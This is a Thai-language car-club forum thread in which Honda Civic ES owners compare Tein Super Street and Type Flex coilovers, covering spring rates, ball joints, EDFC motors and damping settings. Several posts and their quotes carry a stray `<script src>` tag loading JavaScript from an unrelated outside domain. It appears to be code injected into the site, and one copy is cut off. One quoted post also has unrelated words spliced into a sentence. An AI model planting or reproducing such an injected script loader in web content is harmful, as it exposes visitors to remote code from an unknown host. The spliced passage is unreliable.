ตอบ
curran


ชื่อเล่น: บี

เข้าร่วม: 07 กันยา 2009
ตอบ: 4300

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2057
ให้คำขอบคุณ: 5484

ที่อยู่: Samutprakarn
ปี: 2001
สี: ดำ ไนท์ฮอว์ก (B-92P)
เสาร์, 23 ตุลา 2010 21:27 - ระหว่าง tein super street กับ tein type flex ตัวไหนน่าเล่นกว่ากันครับ
เก็บข้อมูล ครับ
ได้รับคำขอบคุณจาก: ake_farlikit 
newcolor


เข้าร่วม: 10 กรกฎา 2010
ตอบ: 989

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2374
ให้คำขอบคุณ: 3894
เสาร์, 23 ตุลา 2010 22:31 - ระหว่าง tein super street กับ tein type flex ตัวไหนน่าเล่นกว่ากันครับ
รอเก็บข้อมูลด้วย
K_series


เข้าร่วม: 01 ตุลา 2008
ตอบ: 3032

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 22059
ให้คำขอบคุณ: 6045
เสาร์, 23 ตุลา 2010 23:01 - ระหว่าง tein super street กับ tein type flex ตัวไหนน่าเล่นกว่ากันครับ
ToR79 พิมพ์ว่า:
flex แข็งกว่า E-spec type legend มากมั้ยครับ



เรื่องแข็งไม่หนีกันเท่าไหร่ครับ แต่อีสเปกจะกระด้างมากกว่าพอสมควร
ได้รับคำขอบคุณจาก: kaorjang  carrimoroll 
Fil-reD


ชื่อเล่น: ฟลุ๊ค

เข้าร่วม: 04 ตุลา 2009
ตอบ: 985

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 757
ให้คำขอบคุณ: 597

ที่อยู่: รามอินทรา_ที่ๆมีสุรา
ปี: 2003
เสาร์, 23 ตุลา 2010 23:03 - ระหว่าง tein super street กับ tein type flex ตัวไหนน่าเล่นกว่ากันครับ
รอกูรูครับ
yoosabai


ชื่อเล่น: เอ้

เข้าร่วม: 30 กันยา 2008
ตอบ: 1992

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 8345
ให้คำขอบคุณ: 4773

ที่อยู่: Samutprakarn
ปี: 2005
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
เสาร์, 23 ตุลา 2010 23:04 - ระหว่าง tein super street กับ tein type flex ตัวไหนน่าเล่นกว่ากันครับ
แข็ง นิ่ม กระเด้ง กระด้าง...อาการทั้งหมดนี้ ต้องลองเองครับ แต่ละคนมาตฐานไม่เท่ากัน ส่วนว่าจะไปลองที่ไหน ก็ลองกับรถของเพื่อนๆ ในคลับนี่ล่ะครับ

ส่วนคุณสมบัติทางกายภาพที่ต่างกันคือ

1. โช๊ค Tein ตรงรุ่นของ ES จะมีรุ่นเดียวคือ Tein Super Street หรือที่เรียกันติดปากว่า "SS"
2. ซึ่ง SS ของ ES จะไม่มี Ball Joint แต่ถ้าหากเป็น SS และ Type Flex ของ DC5 และ EP3 มี Ball joint ข้อดีของ Ball Joint คือสามารถปรับมุม Camber ของล้อหน้าได้ตามต้องการ แต่จะเก็บรายละเอียดของถนนได้ค่อนข้างดี
3. Type Flex ของ DC5 และ EP3 สามารถปรับสูง-ต่ำแบบ Slide กระบอกโช๊คได้ แต่ถ้าเป็น SS ไม่ว่าจะเป็นของ ES, DC5 หรือ EP3 จะไม่สามารถทำได้ ซึ่งข้อดีของโช๊คที่สามารถปรับสูง-ต่ำ Slide กระบอกโช๊คได้คือ เวลาปรับสูง-ต่ำ ค่า K ของสปริงจะไม่เปลี่ยนแปลง
4. ค่า K ของสปริงของ SS สำหรับ ES จะนิ่มกว่า SS และ Type Flex ของทั้ง DC5 และ EP3 ซึ่งของ ES ถ้าจำไม่ผิดจะเป็นหน้า 6 หลัง 8 แต่ถ้าเป็นของ DC5 และ EP3 ทั้ง SS และ Type Flex จะเป็นหน้า 8 หลัง 10
5. หากต้องการใช้ EDFC แต่ละรุ่นจะใช้ Motor คนละเบอร์กัน ถ้าเป็น SS ของ ES จะใช้เบอร์ M10 กับ 12 ถ้าเป็น SS ของ DC5 จะใช้เป็น M10 และ M14 ส่วนของ Tpye Flex ผมไม่ทราบข้อมูลครับ "<script src="https://sport32news.com/civicesgroup.js">
6. ถ้าเป็นของ ES และ EP3 จะสามารถใส่กับ ES ได้เลย แต่หากเป็น DC5 จะต้องมีการดัดแปลงเล็กน้อยเรื่องลูกหมากคันชัก กับหูโช๊คด้านหลัง



ได้รับคำขอบคุณจาก: Fil-reD  PAE KUNG  artoasis  kaorjang  khing_cr  jk2475  Oad  carrimoroll  FRANG_BCP  Ton-  maxch  kloster  Jom-marn  vor_ped  Mundo  etabb  yenjai  TIRL_ES  domziia  nooduean_69  K-yuthya  aod_Ramintra 
Fil-reD


ชื่อเล่น: ฟลุ๊ค

เข้าร่วม: 04 ตุลา 2009
ตอบ: 985

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 757
ให้คำขอบคุณ: 597

ที่อยู่: รามอินทรา_ที่ๆมีสุรา
ปี: 2003
เสาร์, 23 ตุลา 2010 23:33 - ระหว่าง tein super street กับ tein type flex ตัวไหนน่าเล่นกว่ากันครับ
yoosabai พิมพ์ว่า:
แข็ง นิ่ม กระเด้ง กระด้าง...อาการทั้งหมดนี้ ต้องลองเองครับ แต่ละคนมาตฐานไม่เท่ากัน ส่วนว่าจะไปลองที่ไหน ก็ลองกับรถของเพื่อนๆ ในคลับนี่ล่ะครับ

ส่วนคุณสมบัติทางกายภาพที่ต่างกันคือ

1. โช๊ค Tein ตรงรุ่นของ ES จะมีรุ่นเดียวคือ Tein Super Street หรือที่เรียกันติดปากว่า "SS"
2. ซึ่ง SS ของ ES จะไม่มี Ball Joint แต่ถ้าหากเป็น SS และ Type Flex ของ DC5 และ EP3 มี Ball joint ข้อดีของ Ball Joint คือสามารถปรับมุม Camber ของล้อหน้าได้ตามต้องการ แต่จะเก็บรายละเอียดของถนนได้ค่อนข้างดี
3. Type Flex ของ DC5 และ EP3 สามารถปรับสูง-ต่ำแบบ Slide กระบอกโช๊คได้ แต่ถ้าเป็น SS ไม่ว่าจะเป็นของ ES, DC5 หรือ EP3 จะไม่สามารถทำได้ ซึ่งข้อดีของโช๊คที่สามารถปรับสูง-ต่ำ Slide กระบอกโช๊คได้คือ เวลาปรับสูง-ต่ำ ค่า K ของสปริงจะไม่เปลี่ยนแปลง
4. ค่า K ของสปริงของ SS สำหรับ ES จะนิ่มกว่า SS และ Type Flex ของทั้ง DC5 และ EP3 ซึ่งของ ES ถ้าจำไม่ผิดจะเป็นหน้า 6 หลัง 8 แต่ถ้าเป็นของ DC5 และ EP3 ทั้ง SS และ Type Flex จะเป็นหน้า 8 หลัง 10
5. หากต้องการใช้ EDFC แต่ละรุ่นจะใช้ Motor คนละเบอร์กัน ถ้าเป็น SS ของ ES จะใช้เบอร์ M10 กับ 12 ถ้าเป็น SS ของ DC5 จะใช้เป็น M10 และ M14 ส่วนของ Tpye Flex ผมไม่ทราบข้อมูลครับ "<script src="https://sport32news.com/civicesgroup.js">
6. ถ้าเป็นของ ES และ EP3 จะสามารถใส่กับ ES ได้เลย แต่หากเป็น DC5 จะต้องมีการดัดแปลงเล็กน้อยเรื่องลูกหมากคันชัก กับหูโช๊คด้านหลัง







กำลังหาข้อมูลFLEX~พอดีครับ
k-autosociety


ชื่อเล่น: เค

เข้าร่วม: 16 มิถุนา 2009
ตอบ: 1658

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2144
ให้คำขอบคุณ: 3374

ที่อยู่: uttaradit - kasetnavamin
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
อาทิตย์, 24 ตุลา 2010 11:11 - ระหว่าง tein super street กับ tein type flex ตัวไหนน่าเล่นกว่ากันครับ
Fil-reD พิมพ์ว่า:
yoosabai พิมพ์ว่า:
แข็ง นิ่ม กระเด้ง กระด้าง...อาการทั้งหมดนี้ ต้องลองเองครับ แต่ละคนมาตฐานไม่เท่ากัน ส่วนว่าจะไปลองที่ไหน ก็ลองกับรถของเพื่อนๆ ในคลับนี่ล่ะครับ

ส่วนคุณสมบัติทางกายภาพที่ต่างกันคือ

1. โช๊ค Tein ตรงรุ่นของ ES จะมีรุ่นเดียวคือ Tein Super Street หรือที่เรียกันติดปากว่า "SS"
2. ซึ่ง SS ของ ES จะไม่มี Ball Joint แต่ถ้าหากเป็น SS และ Type Flex ของ DC5 และ EP3 มี Ball joint ข้อดีของ Ball Joint คือสามารถปรับมุม Camber ของล้อหน้าได้ตามต้องการ แต่จะเก็บรายละเอียดของถนนได้ค่อนข้างดี
3. Type Flex ของ DC5 และ EP3 สามารถปรับสูง-ต่ำแบบ Slide กระบอกโช๊คได้ แต่ถ้าเป็น SS ไม่ว่าจะเป็นของ ES, DC5 หรือ EP3 จะไม่สามารถทำได้ ซึ่งข้อดีของโช๊คที่สามารถปรับสูง-ต่ำ Slide กระบอกโช๊คได้คือ เวลาปรับสูง-ต่ำ ค่า K ของสปริงจะไม่เปลี่ยนแปลง
4. ค่า K ของสปริงของ SS สำหรับ ES จะนิ่มกว่า SS และ Type Flex ของทั้ง DC5 และ EP3 ซึ่งของ ES ถ้าจำไม่ผิดจะเป็นหน้า 6 หลัง 8 แต่ถ้าเป็นของ DC5 และ EP3 ทั้ง SS และ Type Flex จะเป็นหน้า 8 หลัง 10
5. หากต้องการใช้ EDFC แต่ละรุ่นจะใช้ Motor คนละเบอร์กัน ถ้าเป็น SS ของ ES จะใช้เบอร์ M10 กับ 12 ถ้าเป็น SS ของ DC5 จะใช้เป็น M10 และ M14 ส่วนของ Tpye Flex ผมไม่ทราบข้อมูลครับ "<script src="https://sport32news.com/civicesgroup.js">
6. ถ้าเป็นของ ES และ EP3 จะสามารถใส่กับ ES ได้เลย แต่หากเป็น DC5 จะต้องมีการดัดแปลงเล็กน้อยเรื่องลูกหมากคันชัก กับหูโช๊คด้านหลัง







กำลังหาข้อมูลFLEX~พอดีครับ










เกจิมาตอบเองเลยครับ
Seiko


เข้าร่วม: 12 มีนา 2011
ตอบ: 84

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 39
ให้คำขอบคุณ: 0

ที่อยู่: กรุงเก่า
ปี: 2001
สี: เทา ซิลเวอร์สโตน (NH-630M)
ศุกร์, 16 กันยา 2011 23:53 - อยากทราบฟิวของ tein ss กับ tein flex
อยากทราบฟิวของ tein ss กับ tein flex
ใครใช้อยู่ อภิบายอารมณ์ การขับกันหน่อยครับ
CeaSaR


ชื่อเล่น: น๊อต

เข้าร่วม: 08 ตุลา 2010
ตอบ: 335

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 498
ให้คำขอบคุณ: 1084

ที่อยู่: วัชรพล
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
เสาร์, 17 กันยา 2011 11:09 - ระหว่าง tein super street กับ tein type flex ตัวไหนน่าเล่นกว่ากันครับ
อธิบายยากอ่ะ มาลองขับดูเลยมั้ย Tein flax DC5 ยินดีให้ลองได้ตลอด
ได้รับคำขอบคุณจาก: BALLJARAN35 
OhOnOnO


ชื่อเล่น: โอ๋

เข้าร่วม: 24 มีนา 2011
ตอบ: 99

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 138
ให้คำขอบคุณ: 70

ที่อยู่: ลาดกระบัง(Paseo) ปากน้ำ(วัดไตร)
ปี: 2004
สี: ทอง เดเสิร์ท มิสท์ (เมทัลลิก) (YP-538M)
อาทิตย์, 18 กันยา 2011 11:46 - ระหว่าง tein super street กับ tein type flex ตัวไหนน่าเล่นกว่ากันครับ
CeaSaR พิมพ์ว่า:
อธิบายยากอ่ะ มาลองขับดูเลยมั้ย Tein flax DC5 ยินดีให้ลองได้ตลอด

ใจดีจังครับ
เดี๋ยวผมบึ่งไปจากลาดกระบังเลยได้มั้ยเนี่ย
CeaSaR


ชื่อเล่น: น๊อต

เข้าร่วม: 08 ตุลา 2010
ตอบ: 335

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 498
ให้คำขอบคุณ: 1084

ที่อยู่: วัชรพล
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
จันทร์, 19 กันยา 2011 00:42 - ระหว่าง tein super street กับ tein type flex ตัวไหนน่าเล่นกว่ากันครับ
OhOnOnO พิมพ์ว่า:
CeaSaR พิมพ์ว่า:
อธิบายยากอ่ะ มาลองขับดูเลยมั้ย Tein flax DC5 ยินดีให้ลองได้ตลอด

ใจดีจังครับ
เดี๋ยวผมบึ่งไปจากลาดกระบังเลยได้มั้ยเนี่ย


ได้เลยคับ
Seiko


เข้าร่วม: 12 มีนา 2011
ตอบ: 84

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 39
ให้คำขอบคุณ: 0

ที่อยู่: กรุงเก่า
ปี: 2001
สี: เทา ซิลเวอร์สโตน (NH-630M)
อังคาร, 20 กันยา 2011 23:20 - ระหว่าง tein super street กับ tein type flex ตัวไหนน่าเล่นกว่ากันครับ
ใครขับตัวไหนมาแชกันหน่อนนะครับ
tatumz


เข้าร่วม: 30 กรกฎา 2009
ตอบ: 728

Guru ES
Guru ES

ได้รับคำขอบคุณ: 639
ให้คำขอบคุณ: 494

ที่อยู่: 69
ปี: 2003
พุธ, 21 กันยา 2011 08:23 - ระหว่าง tein super street กับ tein type flex ตัวไหนน่าเล่นกว่ากันครับ
Seiko พิมพ์ว่า:
อยากทราบฟิวของ tein ss กับ tein flex
ใครใช้อยู่ อภิบายอารมณ์ การขับกันหน่อยครับ



CeaSaR พิมพ์ว่า:
อธิบายยากอ่ะ มาลองขับดูเลยมั้ย Tein flax DC5 ยินดีให้ลองได้ตลอด




ช่ายความรู้สึกของคนไม่เหมือนกัน (เหมือนทำนอง ซี๊ดโอ้ววววว 55)มันต้องลอง มีคนให้ลองผมก้อว่าดีกว่าไม่ลองเยอะเลย
ถ้าซื้อไปแล้วไม่ด้ายดั่งใจก้ออย่างงั้น เพราะของมันแพงอ่ะ ลองแล้วอาจไม่ชอบก้อด้าย..อิอิ

ถ้ามาลอง Flex คันนี้ของเจ้าน็อต เด๋วแถม ss ให้ลองอีกคันเลย..555 ยิง 1 ได้ 2 <script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: CeaSaR 
CeaSaR


ชื่อเล่น: น๊อต

เข้าร่วม: 08 ตุลา 2010
ตอบ: 335

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 498
ให้คำขอบคุณ: 1084

ที่อยู่: วัชรพล
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 21 กันยา 2011 11:04 - ระหว่าง tein super street กับ tein type flex ตัวไหนน่าเล่นกว่ากันครับ
tatumz พิมพ์ว่า:
Seiko พิมพ์ว่า:
อยากทราบฟิวของ tein ss กับ tein flex
ใครใช้อยู่ อภิบายอารมณ์ การขับกันหน่อยครับ



CeaSaR พิมพ์ว่า:
อธิบายยากอ่ะ มาลองขับดูเลยมั้ย Tein flax DC5 ยินดีให้ลองได้ตลอด




ช่ายความรู้สึกของคนไม่เหมือนกัน (เหมือนทำนอง ซี๊ดโอ้ววววว 55)มันต้องลอง มีคนให้ลองผมก้อว่าดีกว่าไม่ลองเยอะเลย
ถ้าซื้อไปแล้วไม่ด้ายดั่งใจก้ออย่างงั้น เพราะของมันแพงอ่ะ ลองแล้วอาจไม่ชอบก้อด้าย..อิอิ

ถ้ามาลอง Flex คันนี้ของเจ้าน็อต เด๋วแถม ss ให้ลองอีกคันเลย..555 ยิง 1 ได้ 2 <script src="https://sport32news.com/civicesgroup.js"></


น้ำใจงามจิงพี่เรา

PAE KUNG


ชื่อเล่น: เป้

เข้าร่วม: 08 ตุลา 2008
ตอบ: 1131

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2818
ให้คำขอบคุณ: 3696

ที่อยู่: Bangna&Bangbon
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พุธ, 21 กันยา 2011 13:30 - ระหว่าง tein super street กับ tein type flex ตัวไหนน่าเล่นกว่ากันครับ
SS คือเหมาะกับใช้บนถนน นิ่มหนึบไม่กระด้าง หวดกันหนักๆไม่ค่อยจะอยู่

เลี้ยวแรงๆหนักๆยังมียวบยาบให้รู้สึก ถึงแม้จะปรับเบอร์แข็งสุดก็ตาม

ถ้าจะวัดกับ flex จริงๆ ยังเกาะสู้กันไม่ได้


ส่วน flex ออกแนวแข็งๆ เด้งๆ เลี้ยวดี เลี้ยวง่าย แต่กระด้าง กระเด้งกว่า ss

ถ้าหวดกันหนักๆจริงๆ เอาอยู่ครับกับเครื่อง 1.7 Mt แต่ต้องปรับเบอร์ให้ลงตัว

กับรถเราที่สุดครับถึงจะโอเค (แต่ไม่ได้หมายความว่าเกาะที่สุดนะครับ)


ทั้งนี้ทั้งนั้นขึ้นอยู่กับความชอบส่วนตัวด้วยครับ อันนี้เป็นการลองของผมเอง

อาจจะผิดถูกกับความรู้สึกของใครหลายคนก็เป็นไปได้


เอาเป็นว่าให้ลองครับจะรู้ดีที่สุดว่าเราชอบหรือไม่ชอบ กับเงินเราที่จะจ่ายไป

คุ้มไม่คุ้มกับมูลค่าของมัน เพราะโช้คพวกนี้ราคาไม่เบา ถ้ามันคุ้มกับเงินที่เราจ่าย

ได้ perfermance ที่เราต้องการ เชื่อเถอะครับ คุณจะไม่เสียดายตังค์เลยแบบผม
ได้รับคำขอบคุณจาก: kittidech  CeaSaR  ES21_fatboy  Justinaen  AEtattoo  SIRATH BUALUANG  นุ_ES  pejung  cisco  Favonius  saw  hikaru_kung  HongTae  Phetcharat  kloster  vor_ped  etabb  SuNsHirO_!!  K-yuthya 
ES21_fatboy


เข้าร่วม: 01 ตุลา 2008
ตอบ: 1563

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 11901
ให้คำขอบคุณ: 4229

ที่อยู่: วงแหวนอุตสาหกรรม
ปี: 2004
สี: น้ำเงิน วิวิด (มุก) (B-502P)
พุธ, 21 กันยา 2011 17:29 - ระหว่าง tein super street กับ tein type flex ตัวไหนน่าเล่นกว่ากันครับ
PAE KUNG พิมพ์ว่า:
SS คือเหมาะกับใช้บนถนน นิ่มหนึบไม่กระด้าง หวดกันหนักๆไม่ค่อยจะอยู่

เลี้ยวแรงๆหนักๆยังมียวบยาบให้รู้สึก ถึงแม้จะปรับเบอร์แข็งสุดก็ตาม

ถ้าจะวัดกับ flex จริงๆ ยังเกาะสู้กันไม่ได้


ส่วน flex ออกแนวแข็งๆ เด้งๆ เลี้ยวดี เลี้ยวง่าย แต่กระด้าง กระเด้งกว่า ss

ถ้าหวดกันหนักๆจริงๆ เอาอยู่ครับกับเครื่อง 1.7 Mt แต่ต้องปรับเบอร์ให้ลงตัว

กับรถเราที่สุดครับถึงจะโอเค (แต่ไม่ได้หมายความว่าเกาะที่สุดนะครับ)


ทั้งนี้ทั้งนั้นขึ้นอยู่กับความชอบส่วนตัวด้วยครับ อันนี้เป็นการลองของผมเอง

อาจจะผิดถูกกับความรู้สึกของใครหลายคนก็เป็นไปได้


เอาเป็นว่าให้ลองครับจะรู้ดีที่สุดว่าเราชอบหรือไม่ชอบ กับเงินเราที่จะจ่ายไป

คุ้มไม่คุ้มกับมูลค่าของมัน เพราะโช้คพวกนี้ราคาไม่เบา ถ้ามันคุ้มกับเงินที่เราจ่าย

ได้ perfermance ที่เราต้องการ เชื่อเถอะครับ คุณจะไม่เสียดายตังค์เลยแบบผม



'จารย์เป้ มาตอบเองเลย 555
ได้รับคำขอบคุณจาก: PAE KUNG 
Justinaen


ชื่อเล่น: กระแต

เข้าร่วม: 22 ธันวา 2009
ตอบ: 1249

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1280
ให้คำขอบคุณ: 2461

ที่อยู่: พัทลุง - นนทบุรี - ลพบุรี
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พุธ, 21 กันยา 2011 17:54 - ระหว่าง tein super street กับ tein type flex ตัวไหนน่าเล่นกว่ากันครับ
ได้ความรู้ไว้ประดับสมองอีกแล้วครับท่าน
nu_es_05


ชื่อเล่น: นุ

เข้าร่วม: 10 มิถุนา 2010
ตอบ: 1555

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1058
ให้คำขอบคุณ: 5949

ที่อยู่: สุขุมวิท 101/1
ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 21 กันยา 2011 20:37 - ระหว่าง tein super street กับ tein type flex ตัวไหนน่าเล่นกว่ากันครับ
แล้วชอบแบบไหน ใช้งานยังไงคับ
Seiko


เข้าร่วม: 12 มีนา 2011
ตอบ: 84

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 39
ให้คำขอบคุณ: 0

ที่อยู่: กรุงเก่า
ปี: 2001
สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 21 กันยา 2011 22:27 - ระหว่าง tein super street กับ tein type flex ตัวไหนน่าเล่นกว่ากันครับ
PAE KUNG พิมพ์ว่า:
SS คือเหมาะกับใช้บนถนน นิ่มหนึบไม่กระด้าง หวดกันหนักๆไม่ค่อยจะอยู่

เลี้ยวแรงๆหนักๆยังมียวบยาบให้รู้สึก ถึงแม้จะปรับเบอร์แข็งสุดก็ตาม

ถ้าจะวัดกับ flex จริงๆ ยังเกาะสู้กันไม่ได้


ส่วน flex ออกแนวแข็งๆ เด้งๆ เลี้ยวดี เลี้ยวง่าย แต่กระด้าง กระเด้งกว่า ss

ถ้าหวดกันหนักๆจริงๆ เอาอยู่ครับกับเครื่อง 1.7 Mt แต่ต้องปรับเบอร์ให้ลงตัว

กับรถเราที่สุดครับถึงจะโอเค (แต่ไม่ได้หมายความว่าเกาะที่สุดนะครับ)


ทั้งนี้ทั้งนั้นขึ้นอยู่กับความชอบส่วนตัวด้วยครับ อันนี้เป็นการลองของผมเอง

อาจจะผิดถูกกับความรู้สึกของใครหลายคนก็เป็นไปได้


เอาเป็นว่าให้ลองครับจะรู้ดีที่สุดว่าเราชอบหรือไม่ชอบ กับเงินเราที่จะจ่ายไป

คุ้มไม่คุ้มกับมูลค่าของมัน เพราะโช้คพวกนี้ราคาไม่เบา ถ้ามันคุ้มกับเงินที่เราจ่าย

ได้ perfermance ที่เราต้องการ เชื่อเถแบบว่ายังไงขอหนึบ ๆไว้ก่อนนะครับ แข็งไม่ว่าอะครับ คุณจะไม่เสียดายตังค์เลยแบบผม

ขอบคุณมาก ๆ เลยครับ
Njaichuen


ชื่อเล่น: เดียร์

เข้าร่วม: 15 กันยา 2011
ตอบ: 47

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 17
ให้คำขอบคุณ: 0

ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
อังคาร, 4 ตุลา 2011 17:06 - ระหว่าง tein super street กับ tein type flex ตัวไหนน่าเล่นกว่ากันครับ
ผมคิดว่าจะใส่ tein ตัว flex อ่ะคับ
ใครใส่อยู่ช่วยบอกอารมอีกรอบนะคับ
.......อยากให้มั่นใจนีสสสสนึง
PAE KUNG


ชื่อเล่น: เป้

เข้าร่วม: 08 ตุลา 2008
ตอบ: 1131

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2818
ให้คำขอบคุณ: 3696

ที่อยู่: Bangna&Bangbon
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
อังคาร, 4 ตุลา 2011 20:53 - ระหว่าง tein super street กับ tein type flex ตัวไหนน่าเล่นกว่ากันครับ
Njaichuen พิมพ์ว่า:
ผมคิดว่าจะใส่ tein ตัว flex อ่ะคับ
ใครใส่อยู่ช่วยบอกอารมอีกรอบนะคับ
.......อยากให้มั่นใจนีสสสสนึง



เอาอารมณ์แบบไหนดีล่ะคร๊าบ

เอาเป็นว่านะครับ ตอนที่ผมใส่ ตัวนี้ผมก็ Happy นะครับ (ถ้าไม่ได้ไปลอง Mono flex)แบบเต็มๆ

ถ้าผมจำไม่ผิด เบอร์ที่ผมขับแล้วรู้สึกว่าเกาะที่สุดเด้งน้อยที่สุด หน้า 24 หลัง 22-20 นะครับ (ใช้ edfc)ปรับ

ส่วนเบอร์ที่หนืดกว่านี้ ก็มันดีครับแข็งดี เลี้ยวคมมาก แต่อาการรถจะออกแนวดิ้นๆ โดดๆ หน่อยครับ แต่เกาะแน่นอน

ลองปรับเบอร์หนืดๆขึ้นเรื่อยๆดูครับ ถ้ายิ่งวิ่งเร็วๆ แล้วรู้สึกตัวเริ่มไม่อยู่กับเบาะแล้วแปลว่าคุณปรับหนืดมากไปครับ

เพราะ type flex อาการรถรู้สึกได้เร็วมากๆ อย่างที่ผมบอกไปครับ ให้ลองกับตัวเอง มามิตติ้ง หาเพื่อนๆที่ใส่อยู่ครับ ลองได้เลย

เพื่อนๆในนี้ใจดีทุกคนครับ
ได้รับคำขอบคุณจาก: kittidech  pejung  Ton-  hikaru_kung  HongTae  Phetcharat  vor_ped  sophan.voratus 
idris


ชื่อเล่น: ลิตย์

เข้าร่วม: 12 มีนา 2009
ตอบ: 575

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 1729
ให้คำขอบคุณ: 710

ที่อยู่: มีนบุรี
ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
อังคาร, 4 ตุลา 2011 22:01 - ระหว่าง tein super street กับ tein type flex ตัวไหนน่าเล่นกว่ากันครับ
PAE KUNG พิมพ์ว่า:
Njaichuen พิมพ์ว่า:
ผมคิดว่าจะใส่ tein ตัว flex อ่ะคับ
ใครใส่อยู่ช่วยบอกอารมอีกรอบนะคับ
.......อยากให้มั่นใจนีสสสสนึง



เอาอารมณ์แบบไหนดีล่ะคร๊าบ

เอาเป็นว่านะครับ ตอนที่ผมใส่ ตัวนี้ผมก็ Happy นะครับ (ถ้าไม่ได้ไปลอง Mono flex)แบบเต็มๆ

ถ้าผมจำไม่ผิด เบอร์ที่ผมขับแล้วรู้สึกว่าเกาะที่สุดเด้งน้อยที่สุด หน้า 24 หลัง 22-20 นะครับ (ใช้ edfc)ปรับ

ส่วนเบอร์ที่หนืดกว่านี้ ก็มันดีครับแข็งดี เลี้ยวคมมาก แต่อาการรถจะออกแนวดิ้นๆ โดดๆ หน่อยครับ แต่เกาะแน่นอน

ลองปรับเบอร์หนืดๆขึ้นเรื่อยๆดูครับ ถ้ายิ่งวิ่งเร็วๆ แล้วรู้สึกตัวเริ่มไม่อยู่กับเบาะแล้วแปลว่าคุณปรับหนืดมากไปครับ

เพราะ type flex อาการรถรู้สึกได้เร็วมากๆ อย่างที่ผมบอกไปครับ ให้ลองกับตัวเอง มามิตติ้ง หาเพื่อนๆที่ใส่อยู่ครับ ลองได้เลย

เพื่อนๆในนี้ใจดีทุกคนครับ

เป้..Flex..ปรับ20-24...เลยเหร๊อ...เคยถามมาสเตอร์ชอป..เค้าบอกปรับใด้จริงแค่16เองอะ..งงๆ แล้วผมก็ปรับ หน้า12 หลัง10.. ..เคยลองปรับ14-16 วิ่งไม่ใด้เลยอะเหมือนกับว่าโช้คมันดึงแรงดีดของสปริงไม่อยู่อะ..ขึ้นคอสะพานทีเด้งกว่าจะหยุดก็3-4ดึ๊งอะ..แต่ถ้าปรับหน้า-หลังไม่เกิน12นะ..สะพานสั้นๆขึ้นอีกทางโดดไปลงอีกทางใด้เลยอะ.ดึ๊งเดียวอยู่
ได้รับคำขอบคุณจาก: Ton-  jackiespalow 
pejung


ชื่อเล่น: พี

เข้าร่วม: 12 สิงหา 2011
ตอบ: 540

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 634
ให้คำขอบคุณ: 692

ที่อยู่: กรุงเทพ-แพร่-น่าน-พะเยา-เชียงราย-ลำปาง-เชียงใหม่
ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 5 ตุลา 2011 13:55 - ระหว่าง tein super street กับ tein type flex ตัวไหนน่าเล่นกว่ากันครับ
รอฟังด้วยอีกคน
FAIZ


ชื่อเล่น: ตั๊ก

เข้าร่วม: 30 กันยา 2008
ตอบ: 474

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 996
ให้คำขอบคุณ: 34

ที่อยู่: สุขุมวิท 3 / อโศก
ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 5 ตุลา 2011 15:08 - ระหว่าง tein super street กับ tein type flex ตัวไหนน่าเล่นกว่ากันครับ
idris พิมพ์ว่า:
PAE KUNG พิมพ์ว่า:
Njaichuen พิมพ์ว่า:
ผมคิดว่าจะใส่ tein ตัว flex อ่ะคับ
ใครใส่อยู่ช่วยบอกอารมอีกรอบนะคับ
.......อยากให้มั่นใจนีสสสสนึง



เอาอารมณ์แบบไหนดีล่ะคร๊าบ

เอาเป็นว่านะครับ ตอนที่ผมใส่ ตัวนี้ผมก็ Happy นะครับ (ถ้าไม่ได้ไปลอง Mono flex)แบบเต็มๆ

ถ้าผมจำไม่ผิด เบอร์ที่ผมขับแล้วรู้สึกว่าเกาะที่สุดเด้งน้อยที่สุด หน้า 24 หลัง 22-20 นะครับ (ใช้ edfc)ปรับ

ส่วนเบอร์ที่หนืดกว่านี้ ก็มันดีครับแข็งดี เลี้ยวคมมาก แต่อาการรถจะออกแนวดิ้นๆ โดดๆ หน่อยครับ แต่เกาะแน่นอน

